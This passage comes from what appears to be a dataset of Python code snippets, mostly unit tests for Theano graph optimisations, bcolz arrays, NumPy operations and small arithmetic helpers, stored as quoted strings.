theano.tensor.blas.local_dot22_to_dot22scalar.transform(\r\n node.owner)\r\n assert node2\r\n f = theano.function([x, y, z, m, r, A], node,\r\n mode=mode, on_unused_input='ignore')\r\n f(.1, .2, .3, [[1, 2], [3, 4]], [[5, 6]], [[7, 8], [9, 10]])", "def test_1D(self):\n df = pd.DataFrame(self.df.iloc[:, 0].head(1))\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def test_sum_mat(self):\n self.init()\n assert sum_mat(self.i64_2) == np.sum(self.i64_2)\n assert sum_mat(self.fi64_2) == np.sum(self.fi64_2)\n assert sum_mat(self.f64_2) == np.sum(self.f64_2)\n assert sum_mat(self.ff64_2) == np.sum(self.ff64_2)", "def test_equal4():\n x = np.array([[1, 2, 3]])\n y = np.array([[[[1, 2, 3], [1, 2, 3], [1, 2, 3]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test13(self):\n a = bcolz.ones((self.N, 1))\n b = bcolz.zeros(a.shape)\n b = bcolz.eval('a + b')\n self.assertEqual(b.sum(), self.N)", "def test_multiple(self):\n df = self.df.copy()\n n = df.index.size\n arr = df.values\n out = np_cross_ratios(arr)\n self.assertTrue(np.isfinite(out).any())\n self.assertTrue((out[np.isfinite(out)] > 0).all())\n self.assertTrue(out.shape == (n, self.d, self.d))", "def test_sum_cube(self):\n self.init()\n assert sum_cube(self.i64_3) == np.sum(self.i64_3)\n assert sum_cube(self.fi64_3) == np.sum(self.fi64_3)\n assert sum_cube(self.f64_3) == np.sum(self.f64_3)\n assert sum_cube(self.ff64_3) == np.sum(self.ff64_3)\n assert type(sum_cube(self.i64_3)) == int\n assert type(sum_cube(self.fi64_3)) == int\n assert type(sum_cube(self.f64_3)) == float\n assert type(sum_cube(self.ff64_3)) == float", "def test_suite():\r\n test(add_vectors([1, 1], [1, 1]) == [2, 2])\r\n test(add_vectors([1, 2], [1, 4]) == [2, 6])\r\n test(add_vectors([1, 2, 1], [1, 4, 3]) == [2, 6, 4])\r\n test(scalar_mult(5, [1, 2]) == [5, 10])\r\n test(scalar_mult(3, [1, 0, -1]) == [3, 0, -3])\r\n test(scalar_mult(7, [3, 0, 5, 11, 2]) == [21, 0, 35, 77, 14])\r\n test(dot_product([1, 1], [1, 1]) == 2)\r\n test(dot_product([1, 2], [1, 4]) == 9)\r\n test(dot_product([1, 2, 1], [1, 4, 3]) == 12)\r\n test(cross_product([2,3,4], [5,6,7]) == [-3, 6, -3])", "def test_equal7():\n x = randtool(\"float\", -10, 10, [3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_mcintosh_e(self):\n c = array([1,2,3,1])\n num = sqrt(15)\n den = sqrt(19)\n exp = num/den\n self.assertEqual(mcintosh_e(c), exp)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = 
fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n 
((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n 
((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def testmul_Y_X ( self ):\r\n\t\tr = re.compile ( 'frac' )\r\n\t\tfor fracTupX, fracTupY, dictAdd, dictSub, dictMul, dictDiv in self.knownArithResultValues:\r\n\t\t\tfracX = eval ( r.sub ( 'frac.frac', fracTupX ) )\r\n\t\t\tfracY = eval ( r.sub ( 'frac.frac', fracTupY ) )\r\n\t\t\tmul_fracY_fracX = fracY * fracX\r\n\t\t\tself.assertEqual ( mul_fracY_fracX.toString ().split ()[0], dictMul ['Y*X'] )", "def test01(self):\n a = np.arange(1e5)\n sa = a.sum(dtype='i8')\n ac = bcolz.carray(a)\n sac = ac.sum(dtype='i8')\n # print \"numpy sum-->\", sa\n # print \"carray sum-->\", sac\n self.assertTrue(sa.dtype == sac.dtype,\n \"sum() is not working correctly.\")\n self.assertTrue(sa == sac, \"sum() is not working correctly.\")", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def test_binops(self):", "def non_vectorized_loops(self, data):\n\n non_vectorized = np.zeros(data.shape)\n for row in range(data.shape[0]):\n for col 
in range(data.shape[1]):\n non_vectorized[row][col] = (data[row][col] * data[row][col] +\n data[row][col])\n return non_vectorized", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), 
(dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def test_doubles(self):\n self.assertEqual(doubles(self.TestData), 3)\n self.assertEqual(doubles(array([0,3,4])), 0)\n self.assertEqual(doubles(array([2])), 1)", "def test_expression(x, y, z):\n return x * y + y / z", "def test_adding(self):\n adder = Adder()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i + j, adder.calc(j, i))", "def test_analytical_vs_numerical():\n pass", "def test_equal6():\n x = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def testmul_X_Y ( self ):\r\n\t\tr = re.compile ( 'frac' )\r\n\t\tfor fracTupX, fracTupY, dictAdd, dictSub, dictMul, dictDiv in self.knownArithResultValues:\r\n\t\t\tfracX = eval ( r.sub ( 'frac.frac', fracTupX ) )\r\n\t\t\tfracY = eval ( r.sub ( 'frac.frac', fracTupY ) )\r\n\t\t\tmul_fracX_fracY = fracX * fracY\r\n\t\t\tself.assertEqual ( mul_fracX_fracY.toString ().split ()[0], dictMul ['X*Y'] )", "def test_mul(x, y):\n\n assert mul(x, y) == mul(y, x)", "def test_scalar(self):\r\n x = scalar('x')\r\n p = ptp(x)\r\n f = theano.function([x], p)\r\n\r\n y = numpy.asarray(rand() * 2000 - 1000, dtype=config.floatX)\r\n result = f(y)\r\n numpyResult = numpy.ptp(y)\r\n\r\n self.assertTrue(numpy.array_equal(result, numpyResult))", "def test_xy(self):\n x = np.array([[1,3], [2,8], [1,3]])\n y = np.array([1,1,-1])\n lro = LogisticRegressionOptimiser(x,y)\n expected = np.array([[1,3], [2,8], [-1,-3]])\n for i in 0,1,2:\n for j in 0,1:\n self.assertEqual(lro.xy[i][j], expected[i][j])", "def test_basic(self):\n result = Plugin()._add_bounds_to_thresholds_and_probabilities(\n self.threshold_points, self.probabilities_for_cdf, self.bounds_pairing\n )\n self.assertIsInstance(result[0], np.ndarray)\n self.assertIsInstance(result[1], np.ndarray)", "def test_single(self):\n df = self.df.head(1).copy()\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def test_2():\n\n n1 = 10\n n2 = 100\n ndim = 3\n\n semi_axes = np.random.random((n1,ndim))\n coords = np.array([sample_ellipsoidal_volume(n2, semi_axes[i]) for i in range(0,n1)])\n\n Is = iterative_inertia_tensors_3D(coords)\n\n assert np.shape(Is)==(n1,ndim,ndim)", "def test_is_unital_isometry_true():\n v_mat = np.array([[1, 0, 0], [0, 1, 0]])\n np.testing.assert_equal(is_unital([v_mat], dim=[3, 2]), True)", "def test_multiple(self):\n df = self.df.copy()\n for renorm in [True, False]:\n with self.subTest(renorm=renorm):\n out = nan_weighted_compositional_mean(df.values, renorm=renorm)\n if renorm:\n self.assertTrue(np.allclose(np.sum(out, axis=-1), 1.0))", "def test_positive_slope(self):\n slopes = []\n for i in 
range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_compute(local_registry, dask_array, numpy_array):\n q = local_registry.Quantity(dask_array, units_)\n\n comps = add_five(local_registry, q)\n res = comps.compute()\n\n assert np.all(res.m == numpy_array)\n assert not dask.is_dask_collection(res)\n assert res.units == units_\n assert q.magnitude is dask_array", "def EvaluatePointDataField(self, *float, **kwargs):\n ...", "def test_sphere(self):\n fun = get_problem('sphere', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test_01_pass(self):\n \n print(arr / x)", "def test_numpy_operator():\n A = np.array([1, 2, -1, 3, 0, 4]).reshape(3, 2)\n B = np.array([-1, -3, 2, 0]).reshape(2, 2)\n numerical = A @ B\n # hand-calculated result:\n analytical = np.array([3, -3, 7, 3, 8, 0]).reshape(3, 2)\n msg = 'Error, there is something wrong with numpy\\'s \"@\" operator'\n assert np.array_equal(numerical, analytical), msg", "def _process(self, data: np.array) -> np.array:\n # pylint: disable=no-member\n return unp.sqrt(data[..., 0] ** 2 + data[..., 1] ** 2) * self.scale", "def test_point_with_zero_value_is_good():\n point = np.array([0, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_apply(Group: Type[jaxlie.MatrixLieGroup]):\n T_w_b = sample_transform(Group)\n p_b = onp.random.randn(Group.space_dim)\n\n if Group.matrix_dim == Group.space_dim:\n assert_arrays_close(\n T_w_b @ p_b,\n T_w_b.apply(p_b),\n T_w_b.as_matrix() @ p_b,\n )\n else:\n # Homogeneous coordinates\n assert Group.matrix_dim == Group.space_dim + 1\n assert_arrays_close(\n T_w_b @ p_b,\n T_w_b.apply(p_b),\n (T_w_b.as_matrix() @ onp.append(p_b, 1.0))[:-1],\n )", "def test_step3(self):\n fun = get_problem('step3', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test06(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = bcolz.eval(\"d - 3\")\n nr = b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test(self, x, y, z):\n return self.a*x + self.b*y + self.c*z + self.d", "def test02(self):\n a = np.arange(self.N, dtype='uint64')\n b = bcolz.carray(a, rootdir=self.rootdir)\n c = iter(b.view())\n u = c.iter(3)\n w = b.iter(2)\n self.assertEqual(sum(a[3:]), sum(u))\n self.assertEqual(sum(a[2:]), sum(w))", "def test_mixeddiv():\r\n i = iscalar()\r\n d = dscalar()\r\n assert 0 == function([i, d], d * (i // (i + 1)))(3, 1.0)", "def np_elementwise(mat1, mat2):\n suma = mat1 + mat2\n resta = mat1 - mat2\n multi = mat1 * mat2\n div = mat1 / mat2\n return(suma, resta, multi, div)", "def test_exner_function():\n pressure = np.array([900., 500., 300., 100.]) * units.mbar\n truth = np.array([0.97034558, 0.82033536, 0.70893444, 0.51794747]) * units.dimensionless\n assert_array_almost_equal(exner_function(pressure), truth, 5)", "def test_fonction_p():\n Func = [[7729.018255678793, 140.153834155207, 68.77595919655846, 31.62018118184545, 18.030431610812485,\n 11.480451328936848, 8.854799040173322, 5.891748736768329, 4.107058029460621, 3.525987646397012,\n 2.6501857762543453, 1.9939336429398156, 1.796115967192535, 1.3439730213174272, 1.0573728322694307,\n 0.9370165183504918, 0.6862225806758537, 0.58629480789044, 
0.46467717773394074, 0.4351295050299971,\n 0.31030829231196316, 0.18283441858118177, 0.2508750473787763, 0.12603102215466033, 0.1403733845624147,\n 0.208944572364959, 0.05937056209629393, 0.06406561737973851, 0.02549828229037716, 0.044190126138167286,\n 0.12220850634047802, 0.07250107250107221, 0.008166145780824684, 1.0000000000000118, 0.0016025641025641038,\n 0.00644122383252819, 0.0016025641025641038],\n [0.9610949812702193, 0.4109019899274278, 0.3089377623397382, 0.23495840772645324, 0.20677330100735603,\n 0.19949331148184576, 0.19889217797273162, 0.1983236356606282, 0.20419249563878353, 0.22439671222315674,\n 0.2468001421725052, 0.26934377202851223, 0.3026764978536294, 0.318102154625913, 0.36021755759452945,\n 0.3948630408193794, 0.4151320064818989, 0.4874842761804363, 0.5224160769563155, 0.5581950422944579,\n 0.5694688385000937, 0.55031751183993, 0.6849362225850419, 0.6075803939330335, 0.7350416126522452,\n 0.8427100469155232, 0.6733603675051251, 0.7902933382920369, 0.6836315434546335, 0.8276834938319588,\n 0.9487611479434883, 0.9330768568229448, 0.8193885540523317, 0.997, 0.6670224119530418, 0.8010253123998721,\n 0.6670224119530418]]\n Func2 = [[351.7858724605074, 86.17819599440456, 40.60817807215555, 22.41370879569776, 13.71370737429577, 9.380805367958237, 6.500771030437166, 5.1934818237317595, 3.8672723604183825, 2.9429262287072286, 2.2293044011542276, 1.7413726101499962, 1.4110020679698105, 1.145285045596285, 0.8493079536648233, 0.7075504964039413, 0.5314726701362551, 0.3946934984396482, 0.35765493303260854, 0.26720947446336063, 0.20483675723548622, 0.16768018253752273, 0.1348248093028533, 0.09131928959311625, 0.06352807714123655, 0.10443083847008712, 0.08486764614717036, 0.07948616458565717, 0.034928848641655796, 0.01957585644371944, 0.0101010101010101, 0.0060868252930227846, 0.003034178389628626, 1.0000000000000095, 0.00040016006402561054, 0.999999999998485, 